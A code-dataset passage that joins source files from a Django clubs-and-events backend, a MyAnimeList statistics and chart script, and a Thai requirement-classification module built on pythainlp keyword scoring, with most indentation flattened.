list_display = ('id', 'membership', 'position', 'status', 'start_datetime', 'end_datetime', 'created_by',
'updated_by')
list_per_page = 20
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class ApprovalRequestAdmin(admin.ModelAdmin):
''' Approval request admin '''
list_display = ('id', 'community', 'partial_message', 'attached_file_size', 'status', 'created_at', 'created_by',
'updated_at', 'updated_by')
readonly_fields = ('attached_file_size', 'created_by', 'updated_by',)
list_per_page = 20
def partial_message(self, obj):
''' Get partial message '''
return truncate(obj.message, max_length=32)
def attached_file_size(self, obj):
''' Get attached file size '''
try:
return get_file_size(obj.attached_file)
except ValueError:
return str()
except FileNotFoundError:
return 'FileNotFoundError'
admin.site.register(Request, RequestAdmin)
admin.site.register(Invitation, InvitationAdmin)
admin.site.register(Advisory, AdvisoryAdmin)
admin.site.register(Membership, MembershipAdmin)
admin.site.register(MembershipLog, MembershipLogAdmin)
admin.site.register(ApprovalRequest, ApprovalRequestAdmin)
```
#### File: clubs-and-events-backend/misc/models.py
```python
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext as _
from clubs_and_events.settings import STORAGE_BASE_DIR
from community.models import Event
from core.utils.general import truncate, get_file_extension, has_instance
from core.utils.objects import save_user_attributes
from membership.models import Membership
class FAQ(models.Model):
''' Frequently asked question (FAQ) model '''
def get_image_path(self, file_name):
''' Retrieve image path '''
return '{}/faq/{}.{}'.format(STORAGE_BASE_DIR, self.id, get_file_extension(file_name))
question_en = models.CharField(max_length=255)
question_th = models.CharField(max_length=255)
answer_en = models.TextField(max_length=2048)
answer_th = models.TextField(max_length=2048)
image = models.ImageField(null=True, blank=True, upload_to=get_image_path)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.ForeignKey(get_user_model(), on_delete=models.SET_NULL, null=True, blank=True,
related_name='faq_created_by')
updated_by = models.ForeignKey(get_user_model(), on_delete=models.SET_NULL, null=True, blank=True,
related_name='faq_updated_by')
def __str__(self):
''' String representation '''
return '{}'.format(truncate(self.question_en, max_length=32))
def save(self, *args, **kwargs):
''' Save instance '''
save_user_attributes(self, created_by_field_name='created_by', updated_by_field_name='updated_by')
if self.pk is None:
saved_image = self.image
self.image = None
super(FAQ, self).save(*args, **kwargs)
self.image = saved_image
if 'force_insert' in kwargs:
kwargs.pop('force_insert')
super(FAQ, self).save(*args, **kwargs)
class Vote(models.Model):
''' Vote model '''
comment = models.TextField(max_length=512, blank=True)
voted_for = models.ForeignKey(Membership, on_delete=models.CASCADE, related_name='vote_voted_for')
voted_by = models.ForeignKey(get_user_model(), on_delete=models.CASCADE, related_name='vote_voted_by')
created_at = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
''' Save instance '''
save_user_attributes(self, created_by_field_name='voted_by', updated_by_field_name=None)
super(Vote, self).save(*args, **kwargs)
def clean(self):
''' Validate on save '''
errors = list()
if not has_instance(self.voted_for.community, Event):
            errors.append(ValidationError(_('Votes can only be cast in events.'), code='non_event'))
if len(errors) > 0:
raise ValidationError(errors)
```
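The two-step save in `FAQ.save()` above exists because `get_image_path()` builds the upload path from `self.id`, which is only assigned after the first INSERT: the image is detached, the row is saved once to obtain a primary key, then the image is reattached and saved again (with `force_insert` dropped so the second save is an UPDATE). A minimal standalone sketch of the same pattern, using a hypothetical model that is not part of this project:

```python
from django.db import models

class Attachment(models.Model):
    ''' Hypothetical model illustrating an id-dependent upload path '''

    def get_upload_path(self, file_name):
        # self.id only exists after the row has been inserted once.
        return 'attachments/{}/{}'.format(self.id, file_name)

    file = models.FileField(null=True, blank=True, upload_to=get_upload_path)

    def save(self, *args, **kwargs):
        if self.pk is None:
            held_file, self.file = self.file, None
            super().save(*args, **kwargs)      # first save: obtain the primary key
            self.file = held_file
            kwargs.pop('force_insert', None)   # second save must be an UPDATE
        super().save(*args, **kwargs)
```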
#### File: clubs-and-events-backend/notification/admin.py
```python
from django.contrib import admin
from core.utils.general import has_instance
from notification.models import Notification, RequestNotification, MembershipLogNotification
from notification.models import AnnouncementNotification, CommunityEventNotification, EventNotification
class NotificationAdmin(admin.ModelAdmin):
''' Notification admin '''
list_display = ('user', 'is_read', 'notification_type', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
def notification_type(self, obj):
''' Get notification type '''
if has_instance(obj, RequestNotification):
return 'Request'
elif has_instance(obj, MembershipLogNotification):
return 'Membership Log'
elif has_instance(obj, AnnouncementNotification):
return 'Announcement'
elif has_instance(obj, CommunityEventNotification):
return 'Community Event'
elif has_instance(obj, EventNotification):
return 'Event'
return None
class RequestNotificationAdmin(admin.ModelAdmin):
''' Request notification admin '''
list_display = ('user', 'request', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'request') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class MembershipLogNotificationAdmin(admin.ModelAdmin):
''' Membership log notification admin '''
list_display = ('user', 'membership_log', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'membership_log') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class AnnouncementNotificationAdmin(admin.ModelAdmin):
''' Announcement notification admin '''
list_display = ('user', 'announcement', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'announcement') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class CommunityEventNotificationAdmin(admin.ModelAdmin):
''' Community event notification admin '''
list_display = ('user', 'community_event', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'community_event') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class EventNotificationAdmin(admin.ModelAdmin):
''' Event notification admin '''
list_display = ('user', 'event', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'event') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
admin.site.register(Notification, NotificationAdmin)
admin.site.register(RequestNotification, RequestNotificationAdmin)
admin.site.register(MembershipLogNotification, MembershipLogNotificationAdmin)
admin.site.register(AnnouncementNotification, AnnouncementNotificationAdmin)
admin.site.register(CommunityEventNotification, CommunityEventNotificationAdmin)
admin.site.register(EventNotification, EventNotificationAdmin)
```
#### File: clubs-and-events-backend/notification/views.py
```python
from rest_framework import permissions, viewsets, status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from smtplib import SMTPAuthenticationError
from asset.models import Announcement
from clubs_and_events.settings import EMAIL_NOTIFICATIONS
from community.models import Event, CommunityEvent
from core.permissions import IsInActiveCommunity
from core.utils.filters import filter_queryset_permission, limit_queryset
from core.utils.users import get_email
from membership.models import Request, Invitation
from notification.models import Notification, RequestNotification, MembershipLogNotification
from notification.models import AnnouncementNotification, CommunityEventNotification, EventNotification
from notification.notifier import send_mail_notification, send_mail_notification_process
from notification.permissions import IsNotificationOwner
from notification.serializers import NotificationSerializer, RequestNotificationSerializer
from notification.serializers import MembershipLogNotificationSerializer, AnnouncementNotificationSerializer
from notification.serializers import CommunityEventNotificationSerializer, EventNotificationSerializer
from user.models import EmailPreference
class NotificationViewSet(viewsets.ModelViewSet):
''' Notification view set '''
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
permission_classes = (permissions.IsAuthenticated, IsInActiveCommunity, IsNotificationOwner)
http_method_names = ('get', 'put', 'patch', 'delete', 'head', 'options')
def list(self, request, *args, **kwargs):
''' List notifications '''
queryset = self.get_queryset()
queryset = filter_queryset_permission(queryset, request, self.get_permissions())
queryset = limit_queryset(queryset, request)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
class RequestNotificationViewSet(NotificationViewSet):
''' Request notification view set '''
queryset = RequestNotification.objects.all()
serializer_class = RequestNotificationSerializer
class MembershipLogNotificationViewSet(NotificationViewSet):
''' Membership log notification view set '''
queryset = MembershipLogNotification.objects.all()
serializer_class = MembershipLogNotificationSerializer
class AnnouncementNotificationViewSet(NotificationViewSet):
''' Announcement notification view set '''
queryset = AnnouncementNotification.objects.all()
serializer_class = AnnouncementNotificationSerializer
class CommunityEventNotificationViewSet(NotificationViewSet):
''' Community event notification view set '''
queryset = CommunityEventNotification.objects.all()
serializer_class = CommunityEventNotificationSerializer
class EventNotificationViewSet(NotificationViewSet):
''' Event notification view set '''
queryset = EventNotification.objects.all()
serializer_class = EventNotificationSerializer
@api_view(['POST'])
def test_send_mail(request):
''' Test send mail API '''
# Check superuser authentication
    if not request.user.is_authenticated or not request.user.is_superuser:
return Response({'detail': 'Not superuser.'}, status=status.HTTP_403_FORBIDDEN)
# Check object details
try:
obj_type = request.data['type']
except KeyError:
return Response({'detail': 'Object type was not provided.'}, status=status.HTTP_400_BAD_REQUEST)
try:
obj_id = request.data['id']
except KeyError:
return Response({'detail': 'Object ID was not provided.'}, status=status.HTTP_400_BAD_REQUEST)
# Check language
try:
lang = request.data['lang']
except KeyError:
lang = 'en'
# Check object type
if obj_type.lower() == 'request':
obj = Request.objects.get(pk=obj_id)
elif obj_type.lower() == 'announcement':
obj = Announcement.objects.get(pk=obj_id)
elif obj_type.lower() == 'community_event':
obj = CommunityEvent.objects.get(pk=obj_id)
elif obj_type.lower() == 'event':
obj = Event.objects.get(pk=obj_id)
elif obj_type.lower() == 'invitation':
obj = Invitation.objects.get(pk=obj_id)
else:
return Response({'detail': 'Invalid object type.'}, status=status.HTTP_400_BAD_REQUEST)
# Verification
    email_preference = EmailPreference.objects.get(user_id=request.user.id)
if not EMAIL_NOTIFICATIONS:
return Response(
{'detail': 'Email notification setting is turned off in \'settings.py\'.'},
status=status.HTTP_400_BAD_REQUEST
)
    elif not getattr(email_preference, 'receive_{}'.format(obj_type.lower())):
return Response(
{'detail': 'User\'s email preference for \'{}\' is turned off.'.format(obj_type.lower())},
status=status.HTTP_400_BAD_REQUEST
)
# Send mail notification
try:
send_mail_notification_process(users=(request.user,), lang=lang, obj=obj)
except SMTPAuthenticationError as exception:
return Response({'detail': exception.__str__()}, status=status.HTTP_400_BAD_REQUEST)
# Response
return Response(
{'detail': 'Mail notification sent to {}.'.format(get_email(request.user))}, status=status.HTTP_200_OK
)
```
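A hedged example of exercising the `test_send_mail` view above with DRF's test client. The URL used here is an assumption; the project's actual route for this view is not included in this excerpt:

```python
from rest_framework.test import APIClient

client = APIClient()
client.login(username='admin', password='admin-password')  # must be an authenticated superuser

response = client.post('/api/notification/test-send-mail/', {  # hypothetical route
    'type': 'announcement',  # request, announcement, community_event, event or invitation
    'id': 1,                 # primary key of an object of that type
    'lang': 'en',            # optional, defaults to 'en'
})
print(response.status_code, response.data)
```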
#### File: clubs-and-events-backend/user/admin.py
```python
from datetime import datetime
from django import forms
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import gettext as _
from core.utils.files import get_image_size
from core.utils.general import truncate
from user.models import EmailPreference, StudentCommitteeAuthority
class AlwaysChangedModelForm(forms.ModelForm):
''' A model form class used to set field as always updated '''
def has_changed(self):
return True
class EmailPreferenceInline(admin.StackedInline):
''' Email preference inline '''
model = EmailPreference
form = AlwaysChangedModelForm
extra = 1
readonly_fields = ('unsubscribe_key',)
class StudentCommitteeAuthorityInline(admin.StackedInline):
''' Student committee authority inline '''
model = StudentCommitteeAuthority
readonly_fields = ('created_at', 'created_by', 'updated_at', 'updated_by')
extra = 0
fk_name = 'user'
class UserAdmin(BaseUserAdmin):
''' User admin '''
list_display = ('id', 'username', 'name', 'user_group', 'is_active', 'is_staff', 'is_superuser',
'profile_picture_size')
inlines = (EmailPreferenceInline, StudentCommitteeAuthorityInline)
readonly_fields = ('last_login', 'created_at', 'created_by', 'updated_at', 'updated_by')
list_per_page = 20
fieldsets = (
(None, {'fields': ('username', 'name', 'password')}),
(_('Profile'), {'fields': ('nickname', 'bio', 'profile_picture', 'birthdate')}),
(_('Timestamps'), {'fields': ('last_login', 'created_at', 'created_by', 'updated_at', 'updated_by')}),
(_('Permissions'), {'fields': ('user_group', 'is_active', 'is_staff', 'is_superuser')}),
)
add_fieldsets = (
(None, {'fields': ('username', 'name', '<PASSWORD>', '<PASSWORD>')}),
(_('Profile'), {'fields': ('nickname', 'bio', 'profile_picture', 'birthdate')}),
(_('Permissions'), {'fields': ('user_group', 'is_active', 'is_staff', 'is_superuser')}),
)
def profile_picture_size(self, obj):
''' Get profile picture size and dimensions '''
try:
return get_image_size(obj.profile_picture)
except ValueError:
return str()
except FileNotFoundError:
return 'FileNotFoundError'
class EmailPreferenceAdmin(admin.ModelAdmin):
''' Email preference admin '''
readonly_fields = ('unsubscribe_key',)
list_display = ('id', 'user', 'name', 'receive_request', 'receive_announcement', 'receive_community_event',
'receive_event', 'receive_invitation', 'email_language', 'partial_unsubscribe_key')
list_per_page = 20
def has_add_permission(self, request):
''' Disable add permission '''
return False
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def name(self, obj):
''' Get name of the user '''
return obj.user.name
def partial_unsubscribe_key(self, obj):
''' Get truncated unsubscribe key '''
return truncate(obj.unsubscribe_key, max_length=24)
class StudentCommitteeAuthorityAdmin(admin.ModelAdmin):
''' Student committee authority admin '''
list_display = ('id', 'user', 'start_date', 'end_date', 'is_active', 'created_at', 'created_by', 'updated_at',
'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def is_active(self, obj):
''' Get active status '''
return obj.start_date <= datetime.now().date() <= obj.end_date
is_active.boolean = True
admin.site.register(get_user_model(), UserAdmin)
admin.site.register(EmailPreference, EmailPreferenceAdmin)
admin.site.register(StudentCommitteeAuthority, StudentCommitteeAuthorityAdmin)
``` |
{
"source": "810Teams/mal-chart-maker",
"score": 2
} |
#### File: 810Teams/mal-chart-maker/script_chart.py
```python
from settings import USE_API, MAL_USERNAME, DISPLAY_ANIME_STATS, DISPLAY_MANGA_STATS
from settings import ENABLE_TAG_VALIDATIONS, MUST_BE_TAGGED, MUST_BE_UNTAGGED, APPLY_TAG_RULES
from settings import CHART_STYLE, MANUAL_SORT_ANIME, ENABLE_AUTO_CHART_OPEN
from src.loader import Loader, Parser
from src.render import RenderMachine
from src.utils import notice, error
import os
import platform
import requests
import sys
def main():
''' Main function '''
# Verify API usage settings
if not USE_API:
loader = Loader('data/')
else:
if len(sys.argv) > 1 and len(sys.argv[1]) > 0:
loader = Parser(sys.argv[1])
else:
loader = Parser(MAL_USERNAME)
# Load data
loader.create_document()
user = loader.get_user_object(
include_current=True,
include_onhold=True,
include_dropped=True,
include_planned=True
)
# Retrieve improper tagged entries
improper_tagged_anime = ', '.join(get_improper_tagged(user, list_type='anime'))
improper_tagged_manga = ', '.join(get_improper_tagged(user, list_type='manga'))
# User data displaying
print()
print('- User Data -')
print(' Username: {}'.format(user.info.user_name))
print(' User ID: {}'.format(user.info.user_id))
print()
# Anime statistics displaying
if DISPLAY_ANIME_STATS:
print('- Anime Data -')
print(' List Data', end='\n ')
print('Total: {}'.format(user.anime_list.count('all')), end=' | ')
print('Watching: {}'.format(user.anime_list.count('watching')), end=' | ')
print('Completed: {}'.format(user.anime_list.count('completed')), end=' | ')
print('On-Hold: {}'.format(user.anime_list.count('on-hold')), end=' | ')
print('Dropped: {}'.format(user.anime_list.count('dropped')), end=' | ')
print('Planned: {}'.format(user.anime_list.count('plan to watch')))
print()
if sum(user.anime_list.get_scores()) != 0:
print(' Scoring Data', end='\n ')
print('Total: {}'.format(len(user.anime_list.get_scores())), end=' | ')
print('Range: {}~{}'.format(user.anime_list.get_min(), user.anime_list.get_max()), end=' | ')
print('Average: {:.2f}'.format(user.anime_list.get_average()), end=' | ')
print('Median: {:g}'.format(user.anime_list.get_median()), end=' | ')
print('SD: {:.2f}'.format(user.anime_list.get_sd()))
print()
print(' Improper Tagged')
print(' {}'.format(improper_tagged_anime) if len(improper_tagged_anime) > 0 else ' None, all anime are being tagged properly.')
print()
# Manga statistics displaying
if DISPLAY_MANGA_STATS:
print('- Manga Data -')
print(' List Data', end='\n ')
print('Total: {}'.format(user.manga_list.count('all')), end=' | ')
print('Reading: {}'.format(user.manga_list.count('reading')), end=' | ')
print('Completed: {}'.format(user.manga_list.count('completed')), end=' | ')
print('On-Hold: {}'.format(user.manga_list.count('on-hold')), end=' | ')
print('Dropped: {}'.format(user.manga_list.count('dropped')), end=' | ')
print('Planned: {}'.format(user.manga_list.count('plan to read')))
print()
if sum(user.manga_list.get_scores()) != 0:
print(' Scoring Data', end='\n ')
print('Total: {}'.format(len(user.manga_list.get_scores())), end=' | ')
print('Range: {}~{}'.format(user.manga_list.get_min(), user.manga_list.get_max()), end=' | ')
print('Average: {:.2f}'.format(user.manga_list.get_average()), end=' | ')
print('Median: {:g}'.format(user.manga_list.get_median()), end=' | ')
print('SD: {:.2f}'.format(user.manga_list.get_sd()))
print()
print(' Improper Tagged')
print(' {}'.format(improper_tagged_manga) if len(improper_tagged_manga) > 0 else ' None, all manga are being tagged properly.')
print()
# Render machine initiation
render_machine = RenderMachine('charts/', style=CHART_STYLE)
# Render anime charts
if sum(user.anime_list.get_scores()) != 0:
# Render anime pie chart
render_machine.render_pie_chart(
user.anime_list.get_grouped_list(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME,
disassemble_key=['my_score', 'series_title']
),
title='{}\'{} Anime Series Types'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_series_types'
)
# Render anime bar charts
render_machine.render_bar_chart(
user.anime_list.get_summed_scores(),
title='{}\'{} Scored Anime Titles'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_scored'
)
render_machine.render_bar_chart(
user.anime_list.get_summed_grouped_scores(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME
),
title='{}\'{} Scored Anime Titles (By Series Type)'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_scored_by_series_type'
)
# Render anime treemap chart
render_machine.render_treemap(
user.anime_list.get_grouped_list(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME,
disassemble_key=['my_score', 'series_title']
),
title='{}\'{} Scored Anime Treemap'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_treemap'
)
# Render manga chart
if sum(user.manga_list.get_scores()) != 0:
# Render manga bar chart
render_machine.render_bar_chart(
user.manga_list.get_summed_scores(),
title='{}\'{} Scored Manga Titles'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='manga_scored'
)
# Auto-open charts
if ENABLE_AUTO_CHART_OPEN:
try:
if platform.system() == 'Windows':
notice('Opening chart files automatically is unsupported on Windows.')
else:
os.system('open charts/*')
notice('Opening chart files.')
except (FileNotFoundError, OSError, PermissionError):
error('Something unexpected happened, please try again.')
# Windows' cmd line fix
if platform.system() != 'Windows':
print()
def get_improper_tagged(user, list_type='anime'):
''' Get improper tagged anime/manga title list '''
# Verify settings
if not ENABLE_TAG_VALIDATIONS:
return list()
# Loads list
if list_type == 'anime':
entry_list = user.anime_list.get_full_list(include_unscored=True)
elif list_type == 'manga':
entry_list = user.manga_list.get_full_list(include_unscored=True)
else:
return None
# Tagged-untagged validation
improper = list()
improper += [i for i in entry_list if (not isinstance(i.my_tags, str) or len(i.my_tags) == 0) and i.my_status in MUST_BE_TAGGED] # not tagged in must tagged
improper += [i for i in entry_list if (isinstance(i.my_tags, str) and len(i.my_tags) > 0) and i.my_status in MUST_BE_UNTAGGED] # tagged in must untagged
# Loads tag rules
tag_rules = [i.replace('\n', str()) for i in open('TAG_RULES.txt')]
tag_rules = [tuple(sorted([j.lower().strip() for j in i.split(',')])) for i in tag_rules]
# Filter entries for tag validation
temp = [i for i in entry_list if isinstance(i.my_tags, str) and i.my_status in APPLY_TAG_RULES]
# Tag rules validation
if len(tag_rules) > 0:
for i in range(len(temp)):
temp[i].my_tags = tuple(sorted([j.lower().strip() for j in temp[i].my_tags.split(',')]))
if temp[i].my_tags not in tag_rules:
improper.append(temp[i])
# Return
if list_type == 'anime':
return [i.series_title for i in improper]
elif list_type == 'manga':
return [i.manga_title for i in improper]
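# Added illustration (not part of the original script): both the rules read from
# TAG_RULES.txt and each entry's my_tags string are normalized into sorted,
# lower-cased tuples before comparison, so ordering and spacing do not matter.
# For a hypothetical tag string:
#   raw = 'Fantasy , ACTION'
#   tuple(sorted(t.lower().strip() for t in raw.split(',')))  # -> ('action', 'fantasy')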
if __name__ == '__main__':
main()
``` |
{
"source": "810Teams/requirement-classification",
"score": 3
} |
#### File: requirement-classification/requirement/analysis.py
```python
from pythainlp.corpus.common import thai_words
from pythainlp.tag import pos_tag
from pythainlp import Tokenizer
from pandas import read_csv
from numpy import array
from requirement.models import AnalyzedRequirement
class RequirementData():
'''
Class: RequirementData
Purpose: Contains title and all requirements that have been submitted by user
'''
def __init__(self, title, requirements):
self.title = title # Type: String
if isinstance(requirements, str):
requirements = [i.strip() for i in requirements.split('\n') if i.strip() != '']
for i in range(len(requirements)):
requirements[i] = Requirement(i + 1, requirements[i].replace('\n', ''))
self.requirements = requirements # Type: List<Requirement>
self.by_priority = self.analyze_priority() # Type: RequirementPriorityGroup
self.by_functionality = self.analyze_functionality() # Type: RequirementFunctionalityGroup
self.by_keywords = self.analyze_keywords() # Type: RequirementKeywordGroup
def analyze_priority(self):
response = get_data_group_by_priority(self.requirements)
# Assign values to Requirement objects
for i in response[0]:
i.priority = 2
for i in response[1]:
i.priority = 1
for i in response[2]:
i.priority = 0
return RequirementPriorityGroup(response[0], response[1], response[2])
def analyze_functionality(self):
response = get_data_group_by_functionality(self.requirements)
# Assign values to Requirement objects
for i in range(len(response)):
for j in response[i]:
j.is_functional = not bool(i)
return RequirementFunctionalityGroup(response[0], response[1])
def analyze_keywords(self):
response = get_data_group_by_keyword(self.requirements)
# Assign values to Requirement objects
for i in response:
if i != 'อื่น ๆ':
for j in response[i]:
j.keywords.append(i)
return [RequirementKeywordGroup(i, response[i]) for i in response]
class Requirement():
'''
Class: Requirement
Purpose: Contains data of a single requirement
'''
def __init__(self, id, description):
self.id = id # Type: Integer
self.description = description # Type: String
self.priority = None # Type: Integer
self.is_functional = None # Type: Boolean
self.keywords = list() # Type: List
class RequirementPriorityGroup():
'''
Class: RequirementPriorityGroup
Purpose: Contains requirements grouped in priority levels
'''
def __init__(self, high, medium, low):
self.high = high # Type: List<Requirement>
self.medium = medium # Type: List<Requirement>
self.low = low # Type: List<Requirement>
class RequirementFunctionalityGroup():
'''
Class: RequirementFunctionalityGroup
Purpose: Contains requirements grouped in functionality
'''
def __init__(self, functional, non_functional):
self.functional = functional # Type: List<Requirement>
self.non_functional = non_functional # Type: List<Requirement>
class RequirementKeywordGroup():
'''
Class: RequirementKeywordGroup
Purpose: Contains requirements related to a certain keyword
'''
def __init__(self, keyword, requirements):
self.keyword = keyword # Type: String
self.requirements = requirements # Type: List<Requirement>
class Keyword():
'''
Class: Keyword
Purpose: Contains data of keyword
'''
def __init__(self, word, weight):
self.word = word # Type: String
self.weight = weight # Type: Integer
class TreeNode():
def __init__(self, data):
self.data = data # Type: <Dynamic>
self.children = list() # Type: List<Dynamic>
THAI_WORDS = set(thai_words())
for i in open('requirement/data/custom_tokenizer.txt', encoding="utf-8"):
THAI_WORDS.add(i.replace('\n', '').strip())
TOKENIZER = Tokenizer(THAI_WORDS)
KEYWORDS_HIGH_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-high.csv')).tolist()
]
KEYWORDS_MEDIUM_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-medium.csv')).tolist()
]
KEYWORDS_LOW_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-low.csv')).tolist()
]
KEYWORDS_FUNCTIONAL = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/functional.csv')).tolist()
]
KEYWORDS_NON_FUNCTIONAL = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/non-functional.csv')).tolist()
]
def get_data_group_by_priority(data, use_sample=True):
remove_list = [i.replace('\n', '').strip() for i in open('requirement/data/priority_filter.txt')]
list_high = list()
list_medium = list()
list_low = list()
for i in data:
score = [0, 0, 0]
if use_sample:
score[0] = calculate_score_sample(i, priority=0, remove_list=remove_list)
score[1] = calculate_score_sample(i, priority=1, remove_list=remove_list)
score[2] = calculate_score_sample(i, priority=2, remove_list=remove_list)
else:
score[0] = calculate_score_classic(i, KEYWORDS_HIGH_PRIORITY)
score[1] = calculate_score_classic(i, KEYWORDS_MEDIUM_PRIORITY)
score[2] = calculate_score_classic(i, KEYWORDS_LOW_PRIORITY)
try:
result = round((score[0] * 0 + score[1] * 1 + score[2] * 2)/sum(score))
except ZeroDivisionError:
result = 1
if result == 0:
list_low.append(i)
elif result == 1:
list_medium.append(i)
elif result == 2:
list_high.append(i)
return list_high, list_medium, list_low
def get_data_group_by_functionality(data, use_sample=False):
remove_list = [i.replace('\n', '').strip() for i in open('requirement/data/functionality_filter.txt')]
list_functional = list()
list_non_functional = list()
for i in data:
score = [0, 0]
if use_sample:
score[0] = calculate_score_sample(i, is_functional=False, remove_list=remove_list)
score[1] = calculate_score_sample(i, is_functional=True, remove_list=remove_list)
else:
score[0] = calculate_score_classic(i, KEYWORDS_FUNCTIONAL)
score[1] = calculate_score_classic(i, KEYWORDS_NON_FUNCTIONAL)
try:
result = round((score[0] * 2 + score[1] * 1)/sum(score))
except ZeroDivisionError:
result = 1
if result == 2:
list_functional.append(i)
elif result == 1:
list_non_functional.append(i)
return list_functional, list_non_functional
def get_data_group_by_keyword(data):
dict_keywords = dict()
all_data = list()
counted_data = dict()
exceptions = [
'นะ',
'อยากได้',
'อื่น',
'ไร',
'หน่อย',
'สิ',
]
# Step 1: Append all received data
for i in data:
all_data.append(pos_tag(TOKENIZER.word_tokenize(i.description)))
# Step 2: Count and clean other word types than NCMN (Probably nouns)
for i in all_data:
for j in i:
if j[1] == 'NCMN' and j[0] not in exceptions:
if j not in counted_data:
counted_data[j] = 1
else:
counted_data[j] += 1
# Step 3: Remove exceeded keywords
minimum = 2
while len(counted_data) > 9:
for i in sorted(counted_data, key=lambda x: counted_data[x]):
if counted_data[i] < minimum:
counted_data.pop(i)
minimum += 1
# Step 4: Put all requirements into a dict
for i in counted_data:
dict_keywords[i[0]] = [j for j in data if i[0] in TOKENIZER.word_tokenize(j.description)]
# Step 5: Add requirements without keywords caught
temp = list()
for i in dict_keywords:
for j in dict_keywords[i]:
if j not in temp:
temp.append(j)
dict_keywords['อื่น ๆ'] = [i for i in data if i not in temp]
return dict_keywords
def calculate_score_classic(data, source):
score = 0
for i in source:
check = True
for j in TOKENIZER.word_tokenize(i.word):
if j not in TOKENIZER.word_tokenize(data.description):
check = False
break
score += i.weight * check
return score
def calculate_score_sample(data, priority=None, is_functional=None, remove_list=('NCMN',)):
return dive_tree_compare(
create_tree(
priority=priority,
is_functional=is_functional,
remove_list=remove_list,
show_result=False
),
pos_tag_refined(
TOKENIZER.word_tokenize(data.description),
remove_list=remove_list
)
)
def pos_tag_refined(words, remove_list=('NCMN',)):
return [i for i in pos_tag(words) if i[1] not in remove_list and i[0] != ' ']
def create_tree(priority=None, is_functional=None, remove_list=('NCMN',), show_result=False, result_title=None):
if priority != None and is_functional == None:
items = [i.get_pos_tag_refined(remove_list=remove_list) for i in AnalyzedRequirement.objects.filter(priority=priority)]
elif priority == None and is_functional != None:
items = [i.get_pos_tag_refined(remove_list=remove_list) for i in AnalyzedRequirement.objects.filter(is_functional=is_functional)]
else:
return
root = TreeNode(result_title)
for i in items:
if len(i) != 0:
dive_tree_append(node=root, item=i, level=0)
if show_result:
dive_tree_print(root, 0)
return root
def dive_tree_append(node=TreeNode(None), item=(), level=0):
if item[level] not in [i.data for i in node.children]:
node.children.append(TreeNode(item[level]))
if level + 1 < len(item):
dive_tree_append(
node=node.children[[i.data for i in node.children].index(item[level])],
item=item,
level=level + 1
)
def dive_tree_print(node, level):
print('{}{}'.format(' '*(level), node.data))
for i in node.children:
